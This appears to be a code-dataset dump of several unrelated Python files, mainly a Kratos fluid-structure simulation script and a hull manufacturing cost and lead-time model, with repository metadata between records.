class Aluno(models.Model):
nome = models.CharField('Nome', max_length=60)
matricula = models.CharField('matricula', max_length=11, unique=True)
turma = models.ForeignKey(Turma, on_delete=False, blank=True)
def __str__(self):
return self.matricula + ' - ' + self.nome
class Meta:
verbose_name = 'Aluno'
verbose_name_plural = 'Alunos'
ordering = ['nome', 'matricula']
def get_absolute_url(self):
return reverse('aluno-turma-list', kwargs={'pk': self.pk})
class AlunoSessao(models.Model):
aluno = models.ForeignKey(Aluno, on_delete= models.CASCADE)
sessao = models.ForeignKey(Sessao, on_delete=models.CASCADE)
media = models.DecimalField('Média', decimal_places=2, max_digits=12, validators=[MinValueValidator(Decimal('0.01'))])
descricao_alterativas = models.CharField('Descrição de Alterativas', max_length=60, blank=True)
descricao_pontuacao = models.CharField('Descrição de Pontuação', max_length=60, blank=True)
def __str__(self):
return "{} - {}".format(self.aluno.nome, self.sessao.questionario.nome)
class Meta:
verbose_name = 'AlunoSessao'
verbose_name_plural = 'AlunosSessao'
ordering = ['aluno', 'sessao','media']
def get_absolute_url(self):
return reverse('aluno-turma-list', kwargs={'pk': self.sessao.turma.pk})
| true | true |
1c4aa575b2068b531412b4623eb5aec01caa096f | 6,973 | py | Python | applications/FSIapplication/test_examples/flag_test.gid/flag_test.py | jiaqiwang969/Kratos-test | ed082abc163e7b627f110a1ae1da465f52f48348 | [
"BSD-4-Clause"
] | null | null | null | applications/FSIapplication/test_examples/flag_test.gid/flag_test.py | jiaqiwang969/Kratos-test | ed082abc163e7b627f110a1ae1da465f52f48348 | [
"BSD-4-Clause"
] | null | null | null | applications/FSIapplication/test_examples/flag_test.gid/flag_test.py | jiaqiwang969/Kratos-test | ed082abc163e7b627f110a1ae1da465f52f48348 | [
"BSD-4-Clause"
] | null | null | null | ##################################################################
##################################################################
#setting the domain size for the problem to be solved
domain_size = 2
##################################################################
##################################################################
## ATTENTION: here the order is important
#including kratos path
kratos_libs_path = '../../../../libs/' ##kratos_root/libs
kratos_applications_path = '../../../../applications/' ##kratos_root/applications
import sys
sys.path.append(kratos_libs_path)
sys.path.append(kratos_applications_path)
#importing Kratos main library
from Kratos import *
kernel = Kernel() #defining kernel
#importing applications
import applications_interface
applications_interface.Import_ALEApplication = True
applications_interface.Import_IncompressibleFluidApplication = True
applications_interface.Import_StructuralApplication = True
applications_interface.Import_FSIApplication = True
applications_interface.ImportApplications(kernel, kratos_applications_path)
## from now on the order is not anymore crucial
##################################################################
##################################################################
from KratosStructuralApplication import *
#defining a model part for the fluid and one for the structure
fluid_model_part = ModelPart("FluidPart");
structure_model_part = ModelPart("StructurePart");
#adding variables for all of the tools needed
import incompressible_fluid_solver
incompressible_fluid_solver.AddVariables(fluid_model_part)
import mesh_solver
mesh_solver.AddVariables(fluid_model_part)
import Conformant_OneSideMap
Conformant_OneSideMap.AddVariables(fluid_model_part,structure_model_part)
import structural_solver_dynamic
structural_solver_dynamic.AddVariables(structure_model_part)
import ExplicitCoupling
#NonConformant_OneSideMap.AddVariables(fluid_model_part,structure_model_part)
#introducing input file name
input_file_name = "flag_test"
#reading the fluid part
write_deformed_flag = WriteDeformedMeshFlag.WriteUndeformed
write_elements = WriteConditionsFlag.WriteElementsOnly
post_mode = GiDPostMode.GiD_PostBinary
multi_file_flag = MultiFileFlag.MultipleFiles
gid_io = GidIO( input_file_name+str("_fluid"), post_mode, multi_file_flag, write_deformed_flag, write_elements )
gid_io.ReadModelPart(fluid_model_part)
print fluid_model_part
print "fluid model read correctly"
#reading the structural part
data_io = DatafileIO(input_file_name+str("_structure"))
data_io.ReadModelPart(structure_model_part)
print structure_model_part
print "structural model read correctly"
#setting up the buffer size: SHOULD BE DONE AFTER READING!!!
fluid_model_part.SetBufferSize(3)
structure_model_part.SetBufferSize(2)
##adding dofs
incompressible_fluid_solver.AddDofs(fluid_model_part)
mesh_solver.AddDofs(fluid_model_part)
structural_solver_dynamic.AddDofs(structure_model_part)
#assigning the fluid properties
density = 1.18;
viscosity = 1.82e-5 / density
for node in fluid_model_part.Nodes:
node.SetSolutionStepValue(VISCOSITY,0,viscosity);
node.SetSolutionStepValue(DENSITY,0,density);
#creating the solvers
#fluid solver
fluid_solver = incompressible_fluid_solver.IncompressibleFluidSolver(fluid_model_part,domain_size)
fluid_solver.laplacian_form = 1; #standard laplacian form
fluid_solver.predictor_corrector = False
fluid_solver.max_press_its = 10
fluid_solver.Initialize()
print "fluid solver created"
#mesh solver
reform_dofs_at_each_step = False
mesh_solver = mesh_solver.MeshSolver(fluid_model_part,domain_size,reform_dofs_at_each_step)
pDiagPrecond = DiagonalPreconditioner()
mesh_solver.linear_solver = CGSolver(1e-3, 300, pDiagPrecond)
mesh_solver.time_order = 2
mesh_solver.Initialize()
mesh_solver.solver.SetEchoLevel(0);
print "mesh solver created"
#structure solver
structure_solver = structural_solver_dynamic.DynamicStructuralSolver(structure_model_part,domain_size)
#structure_solver.echo_level = 0
#pILUPrecond = ILU0Preconditioner()
#structure_solver.structure_linear_solver = BICGSTABSolver(1e-8, 5000,pILUPrecond)
structure_solver.Initialize()
structure_model_part.Properties[1].SetValue(CONSTITUTIVE_LAW, Isotropic2D() )
print "structural solver created"
#mapper
#non conformant mapper
#mapper = NonConformant_OneSideMap.NonConformant_OneSideMap(fluid_model_part,structure_model_part)
#conformant point to point
utilities = VariableUtils()
interface_fluid_nodes = (utilities).SelectNodeList(IS_INTERFACE,1.0,fluid_model_part.Nodes)
interface_structure_nodes = (utilities).SelectNodeList(IS_INTERFACE,1.0,structure_model_part.Nodes)
print "interface fluid nodes = ",len(interface_fluid_nodes)
print "interface structure nodes = ",len(interface_structure_nodes)
mapper = Conformant_OneSideMap.Conformant_OneSideMap(interface_fluid_nodes,interface_structure_nodes)
print "mapper created"
#creating the coupled solver
coupled_solver = ExplicitCoupling.ExplicitCoupling(fluid_model_part,structure_model_part,structure_solver,fluid_solver,mesh_solver,mapper,domain_size)
print "coupled solver created"
#settings to be changed
nsteps = 5000
output_step = 10
Dt = 0.005
out = 0
#mesh to be printed
gid_io.InitializeMesh(0.0)
gid_io.WriteMesh((fluid_model_part).GetMesh());
##gid_io.WriteMesh((structure_model_part).GetMesh(),domain_size,GiDPostMode.GiD_PostBinary);
gid_io.FinalizeMesh()
for step in range(0,nsteps):
time = Dt*step
fluid_model_part.CloneTimeStep(time)
structure_model_part.CloneTimeStep(time)
print "time = " , time
#solving the fluid problem
if(step < 5 ):
if(step > 3):
print "solving only the fluid - starting procedure"
fluid_solver.Solve()
print "solution -only fluid- complete"
else:
print "coupled solve"
coupled_solver.Solve()
#print the results
## gid_io.WriteNodalResults(DISPLACEMENT,structure_model_part.Nodes,time,0)
## gid_io.WriteNodalResults(POSITIVE_FACE_PRESSURE,structure_model_part.Nodes,time,0)
if(out == output_step):
gid_io.InitializeResults( time, (fluid_model_part).GetMesh() )
# gid_io.WriteNodalResults(MESH_VELOCITY,fluid_model_part.Nodes,time,0)
gid_io.WriteNodalResults(VELOCITY,fluid_model_part.Nodes,time,0)
gid_io.WriteNodalResults(DISPLACEMENT,fluid_model_part.Nodes,time,0)
gid_io.WriteNodalResults(PRESSURE,fluid_model_part.Nodes,time,0)
# gid_io.WriteNodalResults(IS_INTERFACE,fluid_model_part.Nodes,time,0)
## gid_io.WriteNodalResults(IS_INTERFACE,structure_model_part.Nodes,time,0)
## gid_io.WriteNodalResults(POSITIVE_FACE_PRESSURE,structure_model_part.Nodes,time,0)
## gid_io.WriteNodalResults(NEGATIVE_FACE_PRESSURE,structure_model_part.Nodes,time,0)
## gid_io.WriteNodalResults(DISPLACEMENT,structure_model_part.Nodes,time,0)
#gid_io.Flush();
out = 0
out = out + 1
| 35.040201 | 150 | 0.76452 | domain_size = 2
kratos_libs_path = '../../../../libs/' kratos_applications_path = '../../../../applications/' import sys
sys.path.append(kratos_libs_path)
sys.path.append(kratos_applications_path)
from Kratos import *
kernel = Kernel()
import applications_interface
applications_interface.Import_ALEApplication = True
applications_interface.Import_IncompressibleFluidApplication = True
applications_interface.Import_StructuralApplication = True
applications_interface.Import_FSIApplication = True
applications_interface.ImportApplications(kernel, kratos_applications_path)
from KratosStructuralApplication import *
fluid_model_part = ModelPart("FluidPart");
structure_model_part = ModelPart("StructurePart");
import incompressible_fluid_solver
incompressible_fluid_solver.AddVariables(fluid_model_part)
import mesh_solver
mesh_solver.AddVariables(fluid_model_part)
import Conformant_OneSideMap
Conformant_OneSideMap.AddVariables(fluid_model_part,structure_model_part)
import structural_solver_dynamic
structural_solver_dynamic.AddVariables(structure_model_part)
import ExplicitCoupling
input_file_name = "flag_test"
write_deformed_flag = WriteDeformedMeshFlag.WriteUndeformed
write_elements = WriteConditionsFlag.WriteElementsOnly
post_mode = GiDPostMode.GiD_PostBinary
multi_file_flag = MultiFileFlag.MultipleFiles
gid_io = GidIO( input_file_name+str("_fluid"), post_mode, multi_file_flag, write_deformed_flag, write_elements )
gid_io.ReadModelPart(fluid_model_part)
print fluid_model_part
print "fluid model read correctly"
data_io = DatafileIO(input_file_name+str("_structure"))
data_io.ReadModelPart(structure_model_part)
print structure_model_part
print "structural model read correctly"
fluid_model_part.SetBufferSize(3)
structure_model_part.SetBufferSize(2)
incompressible_fluid_solver.AddDofs(fluid_model_part)
mesh_solver.AddDofs(fluid_model_part)
structural_solver_dynamic.AddDofs(structure_model_part)
density = 1.18;
viscosity = 1.82e-5 / density
for node in fluid_model_part.Nodes:
node.SetSolutionStepValue(VISCOSITY,0,viscosity);
node.SetSolutionStepValue(DENSITY,0,density);
fluid_solver = incompressible_fluid_solver.IncompressibleFluidSolver(fluid_model_part,domain_size)
fluid_solver.laplacian_form = 1; fluid_solver.predictor_corrector = False
fluid_solver.max_press_its = 10
fluid_solver.Initialize()
print "fluid solver created"
reform_dofs_at_each_step = False
mesh_solver = mesh_solver.MeshSolver(fluid_model_part,domain_size,reform_dofs_at_each_step)
pDiagPrecond = DiagonalPreconditioner()
mesh_solver.linear_solver = CGSolver(1e-3, 300, pDiagPrecond)
mesh_solver.time_order = 2
mesh_solver.Initialize()
mesh_solver.solver.SetEchoLevel(0);
print "mesh solver created"
structure_solver = structural_solver_dynamic.DynamicStructuralSolver(structure_model_part,domain_size)
structure_solver.Initialize()
structure_model_part.Properties[1].SetValue(CONSTITUTIVE_LAW, Isotropic2D() )
print "structural solver created"
utilities = VariableUtils()
interface_fluid_nodes = (utilities).SelectNodeList(IS_INTERFACE,1.0,fluid_model_part.Nodes)
interface_structure_nodes = (utilities).SelectNodeList(IS_INTERFACE,1.0,structure_model_part.Nodes)
print "interface fluid nodes = ",len(interface_fluid_nodes)
print "interface structure nodes = ",len(interface_structure_nodes)
mapper = Conformant_OneSideMap.Conformant_OneSideMap(interface_fluid_nodes,interface_structure_nodes)
print "mapper created"
coupled_solver = ExplicitCoupling.ExplicitCoupling(fluid_model_part,structure_model_part,structure_solver,fluid_solver,mesh_solver,mapper,domain_size)
print "coupled solver created"
nsteps = 5000
output_step = 10
Dt = 0.005
out = 0
gid_io.InitializeMesh(0.0)
gid_io.WriteMesh((fluid_model_part).GetMesh());
gid_io.FinalizeMesh()
for step in range(0,nsteps):
time = Dt*step
fluid_model_part.CloneTimeStep(time)
structure_model_part.CloneTimeStep(time)
print "time = " , time
if(step < 5 ):
if(step > 3):
print "solving only the fluid - starting procedure"
fluid_solver.Solve()
print "solution -only fluid- complete"
else:
print "coupled solve"
coupled_solver.Solve()
if(out == output_step):
gid_io.InitializeResults( time, (fluid_model_part).GetMesh() )
gid_io.WriteNodalResults(VELOCITY,fluid_model_part.Nodes,time,0)
gid_io.WriteNodalResults(DISPLACEMENT,fluid_model_part.Nodes,time,0)
gid_io.WriteNodalResults(PRESSURE,fluid_model_part.Nodes,time,0)
out = 0
out = out + 1
| false | true |
1c4aa98aa4f83548da28cc3f7672a27cd6f68e46 | 137 | py | Python | buildscripts/condarecipe/run_test.py | meawoppl/numba | bb8df0aee99133c6d52465ae9f9df2a7996339f3 | [
"BSD-2-Clause"
] | null | null | null | buildscripts/condarecipe/run_test.py | meawoppl/numba | bb8df0aee99133c6d52465ae9f9df2a7996339f3 | [
"BSD-2-Clause"
] | null | null | null | buildscripts/condarecipe/run_test.py | meawoppl/numba | bb8df0aee99133c6d52465ae9f9df2a7996339f3 | [
"BSD-2-Clause"
] | null | null | null | import sys
import numba
if not numba.test():
print("Test failed")
sys.exit(1)
print('numba.__version__: %s' % numba.__version__)
| 19.571429 | 50 | 0.693431 | import sys
import numba
if not numba.test():
print("Test failed")
sys.exit(1)
print('numba.__version__: %s' % numba.__version__)
| true | true |
1c4aa9eedb3b1c6e2e7a3e567eb7ad686eaa3237 | 95 | py | Python | src/learndash/api_resources/__init__.py | MarkMacDon/learndash-python | a3fbfc45567a524b80c732d735f2ae101119f2e4 | [
"MIT"
] | null | null | null | src/learndash/api_resources/__init__.py | MarkMacDon/learndash-python | a3fbfc45567a524b80c732d735f2ae101119f2e4 | [
"MIT"
] | 1 | 2021-05-06T19:01:24.000Z | 2021-05-06T19:01:24.000Z | src/learndash/api_resources/__init__.py | MarkMacDon/learndash-python | a3fbfc45567a524b80c732d735f2ae101119f2e4 | [
"MIT"
] | 2 | 2021-05-05T22:45:04.000Z | 2021-07-24T08:47:02.000Z | from learndash.api_resources.course import Course
from learndash.api_resources.user import User | 47.5 | 49 | 0.884211 | from learndash.api_resources.course import Course
from learndash.api_resources.user import User | true | true |
1c4aaa3ecbd03e5bc7c441414b0760d3b67f14f2 | 14,518 | py | Python | analysis_tools/iFAB/psu_python_library/hull_cost_model.py | lefevre-fraser/openmeta-mms | 08f3115e76498df1f8d70641d71f5c52cab4ce5f | [
"MIT"
] | null | null | null | analysis_tools/iFAB/psu_python_library/hull_cost_model.py | lefevre-fraser/openmeta-mms | 08f3115e76498df1f8d70641d71f5c52cab4ce5f | [
"MIT"
] | null | null | null | analysis_tools/iFAB/psu_python_library/hull_cost_model.py | lefevre-fraser/openmeta-mms | 08f3115e76498df1f8d70641d71f5c52cab4ce5f | [
"MIT"
] | null | null | null | """
hull_cost_model.py
Matthew Woodruff ([email protected])
The Pennsylvania State University
Applied Research Laboratory
2013
Compute the cost and lead time for the hull based on physical
description
"""
import copy
import argparse
import math
import json
import StringIO
from collections import namedtuple
class NoHeaderError(Exception):
pass
def associate(table):
"""
Convert a list-of-lists to a dict-of-dicts.
"""
# stage 1: dict of lists
stage1 = dict([[row[0], row[1:]] for row in table])
header = stage1.get("header", None)
if header is None:
msg = "Need a header to make an associative table.\n"\
"First row was {0}".format(table[0])
raise NoHeaderError(msg)
# stage 2: dict of dicts
stage2 = {}
for key in [key for key in stage1.iterkeys() if key != "header"]:
stage2[key] = dict(zip(header, stage1[key]))
return stage2
class CostModelError(Exception):
pass
class HullCostAndTime(object):
"""
the CostModel contains the logic for each kind of hull production
activity
"""
def __init__(self, tables):
"""
tables: dict of tables (each table is a list of lists)
Because of shared setups, the model is stateful and a new
instance should be used for each evaluation.
"""
# check for appropriate keys
expected = ["model", "shared_setups"]
for table in expected: # raise error if missing data
if tables.get(table, None) is None:
msg = "Hull Cost Model requires a table named {0}"
raise CostModelError(msg.format(table))
self.tables = tables # for now
self.model = associate(tables["model"])
self.operations = self.model.keys()
for row in tables["materials"][1:]:
row[0] = tuple(row[0])
self.materials = associate(tables["materials"])
self.material_types = associate(tables["material_type"])
self.opnames = dict(tables["operations"])
self.setups_counted = []
def material_areas(self, plates):
"""
Compute total area for each (material, thickness)
"""
areas = {}
for plate in plates:
key = plate["key"]
material_type = self.material_types[plate["material"]]
area = areas.get(key, 0)
area += plate["area"]
areas[key] = area
return areas
def material_sheets(self, areas):
"""
Compute number of sheets for each material.
We're not solving the cutting stock problem, and we're
not concerned with panels that are too big to cut out
of a single sheet.
Instead, we compute total area for each type of steel, add
ten percent for scrap, then divide by the area of a sheet
to get the total number of sheets needed.
"""
sheets = {}
for key, area in areas.iteritems():
area *= 1.1 # ten percent scrap
sheetlength = self.materials[key]["length"]
sheetwidth = self.materials[key]["width"]
number = area / (sheetlength * sheetwidth)
sheets[key] = math.ceil(number) # round up to full sheet
return sheets
def nsteelsheets(self, plates):
"""
Total number of steel sheet sides = 2 * number of sheets
(Info needed for blasting.)
"""
areas = self.material_areas(plates)
sheets = self.material_sheets(areas)
nsheets = sum([sheets[key] for key in sheets.iterkeys() if
self.material_types[key[0]]["type"] == "Steel"])
return 2.0 * nsheets
def cuttime(self, plates, technology):
"""
Cutting time is computed the same way for both Plasma
and Laser.
Total cut time depends on thickness, perimeter,
and material of panels.
Assuming you have to cut every edge and you can't use the
edges of the sheets that the plates are cut from.
"""
totaltime = 0
for plate in plates:
key = plate["key"]
material = self.materials[key]
if material["cut"] == technology:
perimeter = 2.0 * plate["perimeter"] # 2 sides
speed = material["cutspeed"]
totaltime += perimeter / speed
return totaltime
def plasmacuttime(self, plates):
return self.cuttime(plates, "Plasma")
def lasercuttime(self, plates):
return self.cuttime(plates, "Laser")
def waterjet(self, plates):
return self.cuttime(plates, "Waterjet")
def perimeter(self, plates, kind):
"""
Used to compute edge prep time. Steel and aluminum are
separate.
"""
perimeter = 0
for plate in plates:
if self.material_types[plate["material"]]["type"] == kind:
perimeter += 2.0 * plate["perimeter"] # 2 sides
return perimeter
def steelperimeter(self, plates):
return self.perimeter(plates, "Steel")
def alperimeter(self, plates):
return self.perimeter(plates, "Aluminum")
def npanels(self, plates):
"""
Total number of panels (all plates) is needed for
build and tack operation
"""
return len(plates)
def weldtime(self, plates, technology):
"""
Welding time depends on perimeter of plates.
We're apparently not concerned that we might need to weld
incompatible plates.
"""
totaltime = 0
for plate in plates:
key = plate["key"]
material = self.materials[key]
if material["weld"] == technology:
perimeter = 2.0 * plate["perimeter"] # 2 sides
speed = material["weldspeed"]
totaltime += (perimeter / (2.0*speed))
return totaltime
def migtime(self, plates):
return self.weldtime(plates, "MIG")
def tigtime(self, plates):
return self.weldtime(plates, "TIG")
def pwmtime(self, plates):
"""
Return 1 for one post-weld machining
"""
return 1
def hullarea(self, plates):
"""
Hull surface area: needed for painting, includes both sides,
units are square meters.
"""
in2 = 2.0 * sum([plate["area"] for plate in plates])
factor = 0.00064516 # to convert to square meters
return in2 * factor
def shipprep(self, plates):
"""
Return 1 for one shipping prep
"""
return 1
def howmuch(self, op, plates):
"""
for given op and plates, how much work needs to be
done? Units vary by operation.
"""
qtys = {
"blast" : self.nsteelsheets,
"plasma" : self.plasmacuttime,
"laser" : self.lasercuttime,
"steelprep" : self.steelperimeter,
"alprep" : self.alperimeter,
"buildntack" : self.npanels,
"mig" : self.migtime,
"tig" : self.tigtime,
"pwm" : self.pwmtime,
"paint" : self.hullarea,
"shipprep" : self.shipprep,
"waterjet" : self.waterjet
}
try:
qty = qtys[op] # KeyError if invalid op
except KeyError:
msg = "{0}: Model has no formula for "\
"work quantity".format(op)
raise CostModelError(msg)
return qty(plates)
def howfast(self, op):
"""
Look up rate in the table. Some rates are 1, meaning that
the quantity of work is already expressed in minutes.
"""
return self.model[op]["workrate"]
def setup(self, op):
"""
Some operations share setups, so if they are both present,
only count one of the setups.
Assume that this method is only called if there is in fact
a setup for the operation.
"""
for group in self.tables["shared_setups"]:
if op in group:
for otherop in group:
if otherop in self.setups_counted:
self.setups_counted.append(op)
return 0
self.setups_counted.append(op)
return self.model[op]["setup"]
def ohqty(self, op, size, laborneeded):
"""
A special exception for painting: overhead is charged by
surface area rather than time.
"""
if op in ["paint"]:
return size
else:
return laborneeded
def prepare_plates(self, plates):
"""
Check that material and dimensional data are present in the
model for all plates
Annotate each plate with its key
Convert units from mm to inches
"""
plates = copy.copy(plates)
counter = 0
for plate in plates:
fields = ["material", "thickness", "area", "perimeter"]
for field in fields:
data = plate.get(field, None)
if data is None:
msg = "No {0} specified for plate {1}"
raise CostModelError(msg.format(field, counter))
material = (plate["material"], plate["thickness"])
plate["key"] = material
material_data = self.materials.get(material, None)
if material_data is None:
msg = "No material data for ({0}, {1}) (plate {2})"
raise CostModelError(
msg.format(material[0], material[1], counter))
# Excel model uses inches
plate["area"] = plate["area"] / 25.4 ** 2 # mm2 to in2
plate["perimeter"] = plate["perimeter"] / 25.4 # mm to in
counter += 1
return plates
def build_cost_and_lead_time(self, plates):
"""
plates: list of summary data about plates
(material, thickness, perimeter, area)
Note that we charge by the hour but work by the minute,
so we convert laborneeded to hours
"""
costs = []
times = []
for op in self.operations:
size = self.howmuch(op, plates)
workrate = self.howfast(op)
if size > 0:
setup = self.setup(op)
else:
setup = 0
laborneeded = (setup + size / workrate) / 60.0
labqty = self.model[op]["labqty"]
labrate = self.model[op]["labrate"]
ohqty = self.ohqty(op, size, laborneeded)
ohrate = self.model[op]["ohrate"]
cost = laborneeded * labqty * labrate \
+ ohqty * ohrate
time = laborneeded
times.append(time)
costs.append(cost)
header = ["operation", "cost", "time"]
operations = [self.opnames[op]
for op in self.operations]
table = [dict(zip(header, record))
for record in zip(operations, costs, times)]
return {"table": table,
"cost": sum(costs), "time": sum(times)}
def material_cost_and_lead_time(self, plates):
cost = 0
time = 0
sheets = self.material_sheets(self.material_areas(plates))
for key in sheets.iterkeys():
matl = self.materials[key]
thickness = key[1]
volume = thickness * matl["length"] * matl["width"]
volume *= sheets[key]
mass = volume * self.material_types[key[0]]["density"]
matlcost = mass * matl["cost"]
cost += matlcost
time = max(time, matl["leadtime"])
return (cost, time)
def mass(plates, materials):
""" compute mass of each plate based on material data """
totalmass = 0
matl_data = dict([(row[0], row[1:]) for row in materials])
for plate in plates:
matl = plate.get("material", "MIL_DTL_12560")
this_matl_data = matl_data.get(matl, [-1, "x", "x", 0.0])
density = this_matl_data[-1] # per cubic inch
thickness = plate.get("thickness", 1.5)
area = plate.get("area", 0)
volume = thickness * area
plate["mass"] = volume * density
totalmass += plate["mass"]
return totalmass
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("hullplates", type=argparse.FileType("r"),
help="json list of plates in the hull")
parser.add_argument("-d", "--model-data",
type=argparse.FileType("r"),
default="hull_cost_data.json",
help="json cost model data")
return parser.parse_args()
def evaluate(plates, tables):
model = HullCostAndTime(tables)
plates = model.prepare_plates(plates)
build = model.build_cost_and_lead_time(plates)
material = model.material_cost_and_lead_time(plates)
matl_cost = material[0]
matl_time = material[1] * 7 # convert weeks to days
build_cost = build["cost"]
build_time = build["time"] / 8.0 # convert hours to days
total_mass = mass(plates, tables["material_type"])
report = {}
report["plates"] = plates
report["Build"] = build["table"]
report["Build Cost"] = build_cost
report["Build Time"] = build_time
report["Material Cost"] = matl_cost
report["Material Lead Time"] = matl_time
report["Total Cost"] = build_cost + matl_cost
report["Total Time"] = build_time + matl_time
report["Total Mass"] = total_mass * 0.453592 # convert to kg
return report
if __name__ == "__main__":
args = get_args()
plates = json.load(args.hullplates)
tables = json.load(args.model_data)
build, material, report = evaluate(plates, tables)
print report
# vim:ts=4:sw=4:expandtab:fdm=indent:wrap lbr:ai:colorcolumn=70
| 35.670762 | 72 | 0.544496 | """
hull_cost_model.py
Matthew Woodruff ([email protected])
The Pennsylvania State University
Applied Research Laboratory
2013
Compute the cost and lead time for the hull based on physical
description
"""
import copy
import argparse
import math
import json
import StringIO
from collections import namedtuple
class NoHeaderError(Exception):
pass
def associate(table):
"""
Convert a list-of-lists to a dict-of-dicts.
"""
stage1 = dict([[row[0], row[1:]] for row in table])
header = stage1.get("header", None)
if header is None:
msg = "Need a header to make an associative table.\n"\
"First row was {0}".format(table[0])
raise NoHeaderError(msg)
stage2 = {}
for key in [key for key in stage1.iterkeys() if key != "header"]:
stage2[key] = dict(zip(header, stage1[key]))
return stage2
class CostModelError(Exception):
pass
class HullCostAndTime(object):
"""
the CostModel contains the logic for each kind of hull production
activity
"""
def __init__(self, tables):
"""
tables: dict of tables (each table is a list of lists)
Because of shared setups, the model is stateful and a new
instance should be used for each evaluation.
"""
expected = ["model", "shared_setups"]
for table in expected: if tables.get(table, None) is None:
msg = "Hull Cost Model requires a table named {0}"
raise CostModelError(msg.format(table))
self.tables = tables self.model = associate(tables["model"])
self.operations = self.model.keys()
for row in tables["materials"][1:]:
row[0] = tuple(row[0])
self.materials = associate(tables["materials"])
self.material_types = associate(tables["material_type"])
self.opnames = dict(tables["operations"])
self.setups_counted = []
def material_areas(self, plates):
"""
Compute total area for each (material, thickness)
"""
areas = {}
for plate in plates:
key = plate["key"]
material_type = self.material_types[plate["material"]]
area = areas.get(key, 0)
area += plate["area"]
areas[key] = area
return areas
def material_sheets(self, areas):
"""
Compute number of sheets for each material.
We're not solving the cutting stock problem, and we're
not concerned with panels that are too big to cut out
of a single sheet.
Instead, we compute total area for each type of steel, add
ten percent for scrap, then divide by the area of a sheet
to get the total number of sheets needed.
"""
sheets = {}
for key, area in areas.iteritems():
area *= 1.1 sheetlength = self.materials[key]["length"]
sheetwidth = self.materials[key]["width"]
number = area / (sheetlength * sheetwidth)
sheets[key] = math.ceil(number) return sheets
def nsteelsheets(self, plates):
"""
Total number of steel sheet sides = 2 * number of sheets
(Info needed for blasting.)
"""
areas = self.material_areas(plates)
sheets = self.material_sheets(areas)
nsheets = sum([sheets[key] for key in sheets.iterkeys() if
self.material_types[key[0]]["type"] == "Steel"])
return 2.0 * nsheets
def cuttime(self, plates, technology):
"""
Cutting time is computed the same way for both Plasma
and Laser.
Total cut time depends on thickness, perimeter,
and material of panels.
Assuming you have to cut every edge and you can't use the
edges of the sheets that the plates are cut from.
"""
totaltime = 0
for plate in plates:
key = plate["key"]
material = self.materials[key]
if material["cut"] == technology:
perimeter = 2.0 * plate["perimeter"] # 2 sides
speed = material["cutspeed"]
totaltime += perimeter / speed
return totaltime
def plasmacuttime(self, plates):
return self.cuttime(plates, "Plasma")
def lasercuttime(self, plates):
return self.cuttime(plates, "Laser")
def waterjet(self, plates):
return self.cuttime(plates, "Waterjet")
def perimeter(self, plates, kind):
"""
Used to compute edge prep time. Steel and aluminum are
separate.
"""
perimeter = 0
for plate in plates:
if self.material_types[plate["material"]]["type"] == kind:
perimeter += 2.0 * plate["perimeter"] # 2 sides
return perimeter
def steelperimeter(self, plates):
return self.perimeter(plates, "Steel")
def alperimeter(self, plates):
return self.perimeter(plates, "Aluminum")
def npanels(self, plates):
"""
Total number of panels (all plates) is needed for
build and tack operation
"""
return len(plates)
def weldtime(self, plates, technology):
"""
Welding time depends on perimeter of plates.
We're apparently not concerned that we might need to weld
incompatible plates.
"""
totaltime = 0
for plate in plates:
key = plate["key"]
material = self.materials[key]
if material["weld"] == technology:
perimeter = 2.0 * plate["perimeter"] speed = material["weldspeed"]
totaltime += (perimeter / (2.0*speed))
return totaltime
def migtime(self, plates):
return self.weldtime(plates, "MIG")
def tigtime(self, plates):
return self.weldtime(plates, "TIG")
def pwmtime(self, plates):
"""
Return 1 for one post-weld machining
"""
return 1
def hullarea(self, plates):
"""
Hull surface area: needed for painting, includes both sides,
units are square meters.
"""
in2 = 2.0 * sum([plate["area"] for plate in plates])
factor = 0.00064516 return in2 * factor
def shipprep(self, plates):
"""
Return 1 for one shipping prep
"""
return 1
def howmuch(self, op, plates):
"""
for given op and plates, how much work needs to be
done? Units vary by operation.
"""
qtys = {
"blast" : self.nsteelsheets,
"plasma" : self.plasmacuttime,
"laser" : self.lasercuttime,
"steelprep" : self.steelperimeter,
"alprep" : self.alperimeter,
"buildntack" : self.npanels,
"mig" : self.migtime,
"tig" : self.tigtime,
"pwm" : self.pwmtime,
"paint" : self.hullarea,
"shipprep" : self.shipprep,
"waterjet" : self.waterjet
}
try:
qty = qtys[op] except KeyError:
msg = "{0}: Model has no formula for "\
"work quantity".format(op)
raise CostModelError(msg)
return qty(plates)
def howfast(self, op):
"""
Look up rate in the table. Some rates are 1, meaning that
the quantity of work is already expressed in minutes.
"""
return self.model[op]["workrate"]
def setup(self, op):
"""
Some operations share setups, so if they are both present,
only count one of the setups.
Assume that this method is only called if there is in fact
a setup for the operation.
"""
for group in self.tables["shared_setups"]:
if op in group:
for otherop in group:
if otherop in self.setups_counted:
self.setups_counted.append(op)
return 0
self.setups_counted.append(op)
return self.model[op]["setup"]
def ohqty(self, op, size, laborneeded):
"""
A special exception for painting: overhead is charged by
surface area rather than time.
"""
if op in ["paint"]:
return size
else:
return laborneeded
def prepare_plates(self, plates):
"""
Check that material and dimensional data are present in the
model for all plates
Annotate each plate with its key
Convert units from mm to inches
"""
plates = copy.copy(plates)
counter = 0
for plate in plates:
fields = ["material", "thickness", "area", "perimeter"]
for field in fields:
data = plate.get(field, None)
if data is None:
msg = "No {0} specified for plate {1}"
raise CostModelError(msg.format(field, counter))
material = (plate["material"], plate["thickness"])
plate["key"] = material
material_data = self.materials.get(material, None)
if material_data is None:
msg = "No material data for ({0}, {1}) (plate {2})"
raise CostModelError(
msg.format(material[0], material[1], counter))
plate["area"] = plate["area"] / 25.4 ** 2 plate["perimeter"] = plate["perimeter"] / 25.4 counter += 1
return plates
def build_cost_and_lead_time(self, plates):
"""
plates: list of summary data about plates
(material, thickness, perimeter, area)
Note that we charge by the hour but work by the minute,
so we convert laborneeded to hours
"""
costs = []
times = []
for op in self.operations:
size = self.howmuch(op, plates)
workrate = self.howfast(op)
if size > 0:
setup = self.setup(op)
else:
setup = 0
laborneeded = (setup + size / workrate) / 60.0
labqty = self.model[op]["labqty"]
labrate = self.model[op]["labrate"]
ohqty = self.ohqty(op, size, laborneeded)
ohrate = self.model[op]["ohrate"]
cost = laborneeded * labqty * labrate \
+ ohqty * ohrate
time = laborneeded
times.append(time)
costs.append(cost)
header = ["operation", "cost", "time"]
operations = [self.opnames[op]
for op in self.operations]
table = [dict(zip(header, record))
for record in zip(operations, costs, times)]
return {"table": table,
"cost": sum(costs), "time": sum(times)}
def material_cost_and_lead_time(self, plates):
cost = 0
time = 0
